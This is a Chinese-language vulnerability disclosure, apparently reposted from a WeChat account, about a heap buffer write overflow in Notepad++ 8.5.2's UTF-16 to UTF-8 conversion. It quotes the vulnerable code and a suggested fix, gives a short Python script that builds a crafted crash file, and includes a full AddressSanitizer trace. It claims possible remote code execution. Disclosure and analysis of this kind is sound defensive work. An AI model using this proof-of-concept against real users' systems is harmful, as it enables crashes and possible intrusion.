测试版本
v8.5.2
漏洞细节
Utf8_16_Read::convert ( )中的堆缓冲区写入溢出
该Utf8_16_Read::convert函数为 UTF16 到 UTF8 转换分配一个新的缓冲区。它计算新的缓冲区大小,对于每两个 UTF16 编码的输入字节可能需要三个 UTF8 字节。但是,当输入长度是格式错误的奇数字节时,计算将关闭。如,在PoC中,当处理第二个字节块时,len设置为 9 并newSize变为 14 (9 + 9 / 2 + 1)。在消耗前 8 个输入字节后,已将pCur14 个元素m_pNewBuf数组中的 12 个元素移位。Utf16_Iter::operator++消耗输入之外的最后 9 个字节和第 10 个字节len。然而,由于 Notepad++ 以块的形式读取文件,因此第 10 个字节来自有效的缓冲区,但包含旧的块数据。
...
case uni16LE: {
size_t newSize = len + len / 2 + 1; // [2]
if (m_nAllocatedBufSize != newSize)
{
if (m_pNewBuf)
delete[] m_pNewBuf;
m_pNewBuf = NULL;
m_pNewBuf = new ubyte[newSize]; // [1]
m_nAllocatedBufSize = newSize;
}
ubyte* pCur = m_pNewBuf;
m_Iter16.set(m_pBuf + nSkip, len - nSkip, m_eEncoding);
while (m_Iter16)
{
++m_Iter16; // [3]
utf8 c;
while (m_Iter16.get(&c)) // [4]
*pCur++ = c; // [5]
}
...
由于Utf16_Iter::read()总是消耗两个字节,因此其有效性运算符应该检查当前指针和下一个指针是否小于末尾:operator bool() { return (m_pRead + 1 < m_pEnd) || (m_out1st != m_outLst); };
漏洞影响
此问题可能会导致RCE
POC
要重现该问题:
-
使用以下 python 脚本创建一个文件:
with open("poc", "wb") as f:
f.write(b'xfexff')
f.write(b'xff' * (128 * 1024 + 4 - 2 + 1))
-
制作Notepad++ 的ASAN 版本。
-
在 Notepad++ 中打开文件以使用 ASAN 进行越界访问。
使用ASAN POC运行结果:
==8896==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x1281524e6472 at pc 0x7ff7308d686e bp 0x00a8c41da680 sp 0x00a8c41da680
WRITE of size 1 at 0x1281524e6472 thread T0
==8896==WARNING: Failed to use and restart external symbolizer!
#0 0x7ff7308d686d in Utf8_16_Read::convert C:nppPowerEditorsrcUtf8_16.cpp:181
#1 0x7ff730060498 in FileManager::loadFileData C:nppPowerEditorsrcScintillaComponentBuffer.cpp:1620
#2 0x7ff73005620f in FileManager::loadFile C:nppPowerEditorsrcScintillaComponentBuffer.cpp:753
#3 0x7ff7305729bd in Notepad_plus::doOpen C:nppPowerEditorsrcNppIO.cpp:422
#4 0x7ff73051a68f in Notepad_plus::command C:nppPowerEditorsrcNppCommands.cpp:3931
#5 0x7ff7304d8163 in Notepad_plus::process C:nppPowerEditorsrcNppBigSwitch.cpp:777
#6 0x7ff7304eb383 in Notepad_plus_Window::runProc C:nppPowerEditorsrcNppBigSwitch.cpp:127
#7 0x7ff7304eafa1 in Notepad_plus_Window::Notepad_plus_Proc C:nppPowerEditorsrcNppBigSwitch.cpp:84
#8 0x7fffdb1e8230 in DispatchMessageW+0x740 (C:WINDOWSSystem32USER32.dll+0x180018230)
#9 0x7fffdb1e7cf0 in DispatchMessageW+0x200 (C:WINDOWSSystem32USER32.dll+0x180017cf0)
#10 0x7ff73091b3eb in wWinMain C:nppPowerEditorsrcwinmain.cpp:720
#11 0x7ff7312b0b71 in invoke_main D:a_work1ssrcvctoolscrtvcstartupsrcstartupexe_common.inl:118
#12 0x7ff7312b0a9d in __scrt_common_main_seh D:a_work1ssrcvctoolscrtvcstartupsrcstartupexe_common.inl:288
#13 0x7ff7312b095d in __scrt_common_main D:a_work1ssrcvctoolscrtvcstartupsrcstartupexe_common.inl:330
#14 0x7ff7312b0bed in wWinMainCRTStartup D:a_work1ssrcvctoolscrtvcstartupsrcstartupexe_wwinmain.cpp:16
#15 0x7fffda4c26ac in BaseThreadInitThunk+0x1c (C:WINDOWSSystem32KERNEL32.DLL+0x1800126ac)
#16 0x7fffdbf2a9f7 in RtlUserThreadStart+0x27 (C:WINDOWSSYSTEM32ntdll.dll+0x18005a9f7)
0x1281524e6472 is located 0 bytes to the right of 2-byte region [0x1281524e6470,0x1281524e6472)
allocated by thread T0 here:
#0 0x7ff731263623 in operator new[] D:a_work1ssrcvctoolsasanllvmcompiler-rtlibasanasan_win_new_array_thunk.cpp:42
#1 0x7ff7308d665a in Utf8_16_Read::convert C:nppPowerEditorsrcUtf8_16.cpp:168
#2 0x7ff730060498 in FileManager::loadFileData C:nppPowerEditorsrcScintillaComponentBuffer.cpp:1620
#3 0x7ff73005620f in FileManager::loadFile C:nppPowerEditorsrcScintillaComponentBuffer.cpp:753
#4 0x7ff7305729bd in Notepad_plus::doOpen C:nppPowerEditorsrcNppIO.cpp:422
#5 0x7ff73051a68f in Notepad_plus::command C:nppPowerEditorsrcNppCommands.cpp:3931
#6 0x7ff7304d8163 in Notepad_plus::process C:nppPowerEditorsrcNppBigSwitch.cpp:777
#7 0x7ff7304eb383 in Notepad_plus_Window::runProc C:nppPowerEditorsrcNppBigSwitch.cpp:127
#8 0x7ff7304eafa1 in Notepad_plus_Window::Notepad_plus_Proc C:nppPowerEditorsrcNppBigSwitch.cpp:84
#9 0x7fffdb1e8230 in DispatchMessageW+0x740 (C:WINDOWSSystem32USER32.dll+0x180018230)
#10 0x7fffdb1e7cf0 in DispatchMessageW+0x200 (C:WINDOWSSystem32USER32.dll+0x180017cf0)
#11 0x7ff73091b3eb in wWinMain C:nppPowerEditorsrcwinmain.cpp:720
#12 0x7ff7312b0b71 in invoke_main D:a_work1ssrcvctoolscrtvcstartupsrcstartupexe_common.inl:118
#13 0x7ff7312b0a9d in __scrt_common_main_seh D:a_work1ssrcvctoolscrtvcstartupsrcstartupexe_common.inl:288
#14 0x7ff7312b095d in __scrt_common_main D:a_work1ssrcvctoolscrtvcstartupsrcstartupexe_common.inl:330
#15 0x7ff7312b0bed in wWinMainCRTStartup D:a_work1ssrcvctoolscrtvcstartupsrcstartupexe_wwinmain.cpp:16
#16 0x7fffda4c26ac in BaseThreadInitThunk+0x1c (C:WINDOWSSystem32KERNEL32.DLL+0x1800126ac)
#17 0x7fffdbf2a9f7 in RtlUserThreadStart+0x27 (C:WINDOWSSYSTEM32ntdll.dll+0x18005a9f7)
SUMMARY: AddressSanitizer: heap-buffer-overflow C:nppPowerEditorsrcUtf8_16.cpp:181 in Utf8_16_Read::convert
Shadow bytes around the buggy address:
0x04cd7c51cc30: fa fa 00 00 fa fa fd fd fa fa 00 00 fa fa fd fd
0x04cd7c51cc40: fa fa 00 00 fa fa fd fd fa fa 00 00 fa fa fd fd
0x04cd7c51cc50: fa fa 00 00 fa fa fd fd fa fa 00 00 fa fa fd fd
0x04cd7c51cc60: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
0x04cd7c51cc70: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
=>0x04cd7c51cc80: fa fa fd fd fa fa fd fd fa fa fd fd fa fa[02]fa
0x04cd7c51cc90: fa fa fd fa fa fa fd fa fa fa 00 00 fa fa 04 fa
0x04cd7c51cca0: fa fa 04 fa fa fa 01 fa fa fa 04 fa fa fa 01 fa
0x04cd7c51ccb0: fa fa 01 fa fa fa 04 fa fa fa 00 fa fa fa 04 fa
0x04cd7c51ccc0: fa fa 04 fa fa fa 04 fa fa fa 00 00 fa fa 04 fa
0x04cd7c51ccd0: fa fa 04 fa fa fa 04 fa fa fa 04 fa fa fa 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
Address Sanitizer Error: Heap buffer overflow原文始发于微信公众号(军机故阁):Notepad++堆缓冲区写入溢出
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论